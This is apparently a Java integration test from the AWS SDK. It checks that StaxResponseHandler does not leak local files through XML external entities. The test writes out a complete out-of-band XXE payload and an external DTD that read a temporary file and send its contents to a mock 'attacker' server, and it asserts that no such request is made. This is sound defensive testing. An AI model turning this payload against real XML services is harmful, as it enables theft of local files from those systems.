/*
* Copyright (c) 2017. Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
package com.amazonaws.http;
import static com.github.tomakehurst.wiremock.client.WireMock.aResponse;
import static com.github.tomakehurst.wiremock.client.WireMock.get;
import static com.github.tomakehurst.wiremock.client.WireMock.getRequestedFor;
import static com.github.tomakehurst.wiremock.client.WireMock.stubFor;
import static com.github.tomakehurst.wiremock.client.WireMock.urlPathEqualTo;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.CoreMatchers.equalTo;
import static org.mockito.Mockito.*;
import com.amazonaws.AmazonWebServiceResponse;
import com.amazonaws.transform.StaxUnmarshallerContext;
import com.amazonaws.transform.Unmarshaller;
import com.github.tomakehurst.wiremock.client.VerificationException;
import com.github.tomakehurst.wiremock.client.WireMock;
import com.github.tomakehurst.wiremock.junit.WireMockRule;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.TemporaryFolder;
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.PrintWriter;
import java.nio.charset.Charset;
import javax.xml.stream.events.XMLEvent;
/**
 * Integration test checking that {@link StaxResponseHandler} cannot be used to leak the
 * contents of a local file through XML external entities (XXE).
 *
 * <p>The test serves a malicious external DTD from a local WireMock server. If the XML parser
 * behind the handler resolved external entities, it would read a temporary file and send its
 * contents back to the mock server as a query string. The test asserts that no such request is
 * ever received.
 */
public class StaxResponseHandlerIntegrationTest {

    /** Marker written to the temporary file; it must never appear in a request to the mock server. */
    private static final String FILE_CONTENTS = "hello-world";

    /** URL (path plus query) the parser would request if it leaked the temporary file. */
    private static final String EXFILTRATION_URL = "/?" + FILE_CONTENTS;

    /** Mock HTTP server on a dynamically assigned port; plays the attacker-controlled host. */
    @Rule
    public WireMockRule wireMockServer = new WireMockRule(0);

    /** Holds the "secret" local file the payload tries to read. */
    @Rule
    public TemporaryFolder temporaryFolder = new TemporaryFolder();

    /**
     * Feeds an XXE payload to the response handler and verifies that the contents of a local
     * file are not sent to the mock server.
     *
     * @throws Exception if the test fixture (temporary file, stubs) cannot be set up
     */
    @Test
    public void saxParserShouldNotExposeLocalFileSystem() throws Exception {
        File tmpFile = temporaryFolder.newFile("contents.txt");
        writeToTmpFile(tmpFile, FILE_CONTENTS);

        String mockServerUrl = "http://127.0.0.1:" + wireMockServer.port();

        // Document that pulls in an external DTD (%asd;), expands the entity it defines (%c;),
        // and finally dereferences &rrr;, whose system identifier embeds the file contents.
        String payload = "<?xml version=\"1.0\" ?> \n" +
                         "<!DOCTYPE a [ \n" +
                         "<!ENTITY % asd SYSTEM \"" + mockServerUrl + "/payload.dtd\"> \n" +
                         "%asd; \n" +
                         "%c; \n" +
                         "]> \n" +
                         "<a>&rrr;</a>";

        // External DTD: %file; reads the local file, %c; declares &rrr; as a request back to the
        // mock server carrying the file contents in the query string.
        String entityString = "<!ENTITY % file SYSTEM \"" + tmpFile.toURI() + "\"> \n" +
                              "<!ENTITY % c \"<!ENTITY rrr SYSTEM '" + mockServerUrl + "/?%file;'>\">";

        stubFor(get(urlPathEqualTo("/payload.dtd")).willReturn(aResponse().withBody(entityString)));
        // The leak target contains a query string, so match on the full URL rather than the path.
        stubFor(get(WireMock.urlEqualTo(EXFILTRATION_URL)).willReturn(aResponse()));

        StaxResponseHandler<String> responseHandler = new StaxResponseHandler<String>(dummyUnmarshaller());
        HttpResponse response = mock(HttpResponse.class);
        when(response.getContent()).thenReturn(new ByteArrayInputStream(payload.getBytes(Charset.forName("UTF-8"))));

        try {
            responseHandler.handle(response);
        } catch (Exception ignored) {
            // Deliberately ignored: whether the handler rejects the document or parses it is
            // irrelevant here. The only thing under test is that no leaking request is made.
        }

        // The request carrying the file contents must never have been made.
        WireMock.verify(0, getRequestedFor(WireMock.urlEqualTo(EXFILTRATION_URL)));
    }

    /**
     * Creates an unmarshaller that consumes every event of the document, so that any entity
     * the parser is willing to resolve actually gets resolved.
     *
     * @return an unmarshaller that reads to the end of the document and returns {@code "Success"}
     */
    private Unmarshaller<String, StaxUnmarshallerContext> dummyUnmarshaller() {
        return new Unmarshaller<String, StaxUnmarshallerContext>() {
            @Override
            public String unmarshall(StaxUnmarshallerContext in) throws Exception {
                while (!in.nextEvent().isEndDocument()) {
                    //read the whole document
                }
                return "Success";
            }
        };
    }

    /**
     * Writes {@code contents} to {@code tmpFile} as UTF-8.
     *
     * @param tmpFile  file to (over)write
     * @param contents text to store in the file
     * @throws IOException if the file cannot be opened or the write fails
     */
    private void writeToTmpFile(File tmpFile, String contents) throws IOException {
        PrintWriter writer = new PrintWriter(tmpFile, "UTF-8");
        try {
            writer.write(contents);
            // PrintWriter never throws on write; checkError() flushes and reports any failure.
            if (writer.checkError()) {
                throw new IOException("Failed to write test fixture " + tmpFile);
            }
        } finally {
            writer.close();
        }
    }
}